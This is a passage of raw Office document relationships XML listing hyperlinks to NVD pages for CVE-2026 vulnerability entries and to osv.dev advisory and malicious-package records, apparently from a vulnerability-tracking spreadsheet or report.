Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93075" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93076" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93077" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93078" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93079" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93080" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93081" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93082" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93083" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93084" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93085" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93086" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93089" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93090" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93091" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93092" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93093" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93094" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93095" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93096" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93097" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93098" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93099" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93100" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93101" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93102" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93103" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93104" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93105" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93106" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93107" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93108" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93109" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93110" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93111" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93112" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93113" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93114" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93115" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93116" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93117" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93118" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93119" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93120" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93121" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93122" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93123" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93124" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93125" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93126" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93127" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93128" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93129" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93130" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93131" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93132" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93133" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93134" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93135" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93136" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93137" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93138" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93139" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9314" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93140" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93141" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93142" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93143" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93144" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93145" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93146" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93147" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93148" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93149" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93150" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93151" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93152" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93153" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93154" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93155" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93156" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93157" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93158" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93159" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93160" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93161" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93162" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93163" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93164" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93165" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93166" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93167" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93168" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93169" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93170" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93171" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93172" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93173" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93174" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93175" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93176" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93177" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93178" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93179" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93180" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93181" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93182" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93183" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93184" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93185" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93186" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93187" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93188" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93189" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93190" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93191" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93192" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93193" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93194" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93195" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93196" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93197" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93198" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93199" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93200" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93201" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93202" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93203" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93204" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93372" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93373" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93374" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93375" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93376" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93377" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93378" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93379" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93380" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93381" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93382" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93383" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93384" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93385" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93386" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93387" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16255" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16248" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16258" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16249" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16257" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16272" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16266" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16259" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16265" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16256" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16250" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16251" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16252" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16254" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16260" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16261" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16262" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16263" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16264" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16267" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 